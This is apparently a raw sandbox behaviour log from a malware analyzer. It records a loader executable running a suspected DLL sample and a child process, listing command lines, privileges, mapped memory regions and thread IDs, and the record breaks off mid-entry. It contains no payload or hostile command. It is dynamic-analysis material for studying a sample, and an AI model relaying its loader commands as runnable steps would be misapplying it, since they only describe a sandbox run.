# Flog Txt Version 1 # Analyzer Version: 2.3.0 # Analyzer Build Date: Apr 12 2018 14:32:59 # Log Creation Date: 29.04.2018 13:05:57.942 Process: id = "1" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f680" os_pid = "0xa3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fel=\"c:\\users\\eebsym5\\appdata\\local\\temp\\tmpb1jc7c\" /s" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 136 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 137 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 138 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 139 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 140 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 141 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 142 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 143 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 144 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 145 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 146 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 147 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 148 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 149 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 150 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 151 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 152 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 153 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 154 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 155 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 156 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 157 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 158 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 159 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 160 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 161 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 162 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 163 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 164 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 165 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 166 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 167 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 168 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 169 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 170 start_va = 0x75e20000 end_va = 0x75e2bfff entry_point = 0x75e20000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 171 start_va = 0x74d30000 end_va = 0x74d6ffff entry_point = 0x74d30000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 172 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 173 start_va = 0x1200000 end_va = 0x12defff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 174 start_va = 0x1330000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 175 start_va = 0x1370000 end_va = 0x163efff entry_point = 0x1370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 176 start_va = 0x17a0000 end_va = 0x189ffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 177 start_va = 0x74d70000 end_va = 0x74e64fff entry_point = 0x74d70000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 178 start_va = 0x77690000 end_va = 0x7771efff entry_point = 0x77690000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 179 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 180 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 181 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 182 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 183 start_va = 0x74eb0000 end_va = 0x7504dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 184 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 185 start_va = 0x190000 end_va = 0x191fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 186 start_va = 0x77600000 end_va = 0x77682fff entry_point = 0x77600000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 187 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 188 start_va = 0x74550000 end_va = 0x74570fff entry_point = 0x74550000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 189 start_va = 0x763a0000 end_va = 0x763e4fff entry_point = 0x763a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 190 start_va = 0x400000 end_va = 0x41efff entry_point = 0x400000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db") Region: id = 191 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 192 start_va = 0x75ed0000 end_va = 0x75edafff entry_point = 0x75ed0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 193 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x3f0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 194 start_va = 0x430000 end_va = 0x45ffff entry_point = 0x430000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 195 start_va = 0x460000 end_va = 0x463fff entry_point = 0x460000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 196 start_va = 0x1190000 end_va = 0x1196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 197 start_va = 0x11a0000 end_va = 0x11a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 198 start_va = 0x1640000 end_va = 0x16a5fff entry_point = 0x1640000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 199 start_va = 0x18a0000 end_va = 0x1c92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000018a0000" filename = "" Region: id = 200 start_va = 0x75f40000 end_va = 0x75f4bfff entry_point = 0x75f40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 201 start_va = 0x76050000 end_va = 0x7616cfff entry_point = 0x76050000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 202 start_va = 0x763f0000 end_va = 0x765eafff entry_point = 0x763f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 203 start_va = 0x76600000 end_va = 0x766f4fff entry_point = 0x76600000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 204 start_va = 0x77830000 end_va = 0x77965fff entry_point = 0x77830000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 205 start_va = 0x75e00000 end_va = 0x75e1afff entry_point = 0x75e00000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 206 start_va = 0x11b0000 end_va = 0x11b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 207 start_va = 0x1770000 end_va = 0x186ffff entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 208 start_va = 0x1de0000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 209 start_va = 0x1f70000 end_va = 0x206ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 210 start_va = 0x75f50000 end_va = 0x75f61fff entry_point = 0x75f50000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 211 start_va = 0x76170000 end_va = 0x76196fff entry_point = 0x76170000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 212 start_va = 0x77cd0000 end_va = 0x77e6cfff entry_point = 0x77cd0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 213 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 214 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 1 os_tid = 0xa40 Thread: id = 2 os_tid = 0xa44 Thread: id = 3 os_tid = 0xa48 Thread: id = 4 os_tid = 0xa4c Thread: id = 6 os_tid = 0xa58 Thread: id = 7 os_tid = 0xa5c Thread: id = 9 os_tid = 0xa68 Thread: id = 11 os_tid = 0xa74 Thread: id = 14 os_tid = 0xa88 Thread: id = 17 os_tid = 0xa98 Thread: id = 19 os_tid = 0xaa4 Thread: id = 22 os_tid = 0xab4 Thread: id = 24 os_tid = 0xac0 Thread: id = 27 os_tid = 0xad0 Thread: id = 29 os_tid = 0xadc Thread: id = 31 os_tid = 0xae8 Thread: id = 33 os_tid = 0xaf4 Thread: id = 35 os_tid = 0xb00 Thread: id = 37 os_tid = 0xb0c Thread: id = 39 os_tid = 0xb18 Thread: id = 41 os_tid = 0xb24 Thread: id = 43 os_tid = 0xb30 Thread: id = 45 os_tid = 0xb3c Thread: id = 47 os_tid = 0xb48 Thread: id = 49 os_tid = 0xb54 Thread: id = 51 os_tid = 0xb60 Thread: id = 53 os_tid = 0xb6c Thread: id = 55 os_tid = 0xb78 Thread: id = 57 os_tid = 0xb84 Thread: id = 59 os_tid = 0xb90 Thread: id = 61 os_tid = 0xb9c Thread: id = 63 os_tid = 0xba8 Thread: id = 65 os_tid = 0xbb4 Thread: id = 67 os_tid = 0xbc0 Thread: id = 69 os_tid = 0xbcc Thread: id = 71 os_tid = 0xbd8 Thread: id = 73 os_tid = 0xbf8 Thread: id = 75 os_tid = 0xc04 Thread: id = 77 os_tid = 0xc10 Thread: id = 79 os_tid = 0xc24 Thread: id = 81 os_tid = 0xc30 Thread: id = 83 os_tid = 0xc3c Thread: id = 85 os_tid = 0xc50 Thread: id = 87 os_tid = 0xc5c Thread: id = 89 os_tid = 0xc68 Thread: id = 91 os_tid = 0xc78 Thread: id = 93 os_tid = 0xc88 Thread: id = 95 os_tid = 0xc94 Thread: id = 97 os_tid = 0xca0 Thread: id = 99 os_tid = 0xcac Thread: id = 101 os_tid = 0xcb8 Thread: id = 103 os_tid = 0xcc4 Thread: id = 105 os_tid = 0xcd0 Thread: id = 107 os_tid = 0xcdc Thread: id = 109 os_tid = 0xce8 Thread: id = 111 os_tid = 0xcf4 Thread: id = 113 os_tid = 0xd00 Thread: id = 115 os_tid = 0xd0c Thread: id = 117 os_tid = 0xd18 Thread: id = 119 os_tid = 0xd28 Thread: id = 121 os_tid = 0xd38 Thread: id = 123 os_tid = 0xd44 Thread: id = 125 os_tid = 0xd50 Thread: id = 127 os_tid = 0xd64 Thread: id = 129 os_tid = 0xd70 Thread: id = 131 os_tid = 0xd7c Thread: id = 133 os_tid = 0xd88 Thread: id = 135 os_tid = 0xd94 Thread: id = 137 os_tid = 0xda0 Thread: id = 139 os_tid = 0xdac Thread: id = 141 os_tid = 0xdb8 Thread: id = 152 os_tid = 0xdec Thread: id = 154 os_tid = 0xe88 Thread: id = 156 os_tid = 0xe94 Thread: id = 158 os_tid = 0xea0 Thread: id = 160 os_tid = 0xeac Thread: id = 162 os_tid = 0xeb8 Process: id = "2" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f3c0" os_pid = "0xa50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 215 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 216 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 217 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 218 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 219 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 220 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 221 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 222 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 223 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 224 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 225 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 226 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 227 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 228 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 229 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 230 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 231 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 232 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 233 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 234 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 235 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 236 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 237 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 238 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 239 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 240 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 241 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 242 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 243 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 244 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 245 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 246 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 247 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 248 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 249 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 250 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 251 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 252 start_va = 0x640000 end_va = 0x83ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 263 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 283 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 284 start_va = 0xd0000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 285 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 286 start_va = 0x120000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 287 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 314 start_va = 0x6a0000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 315 start_va = 0x830000 end_va = 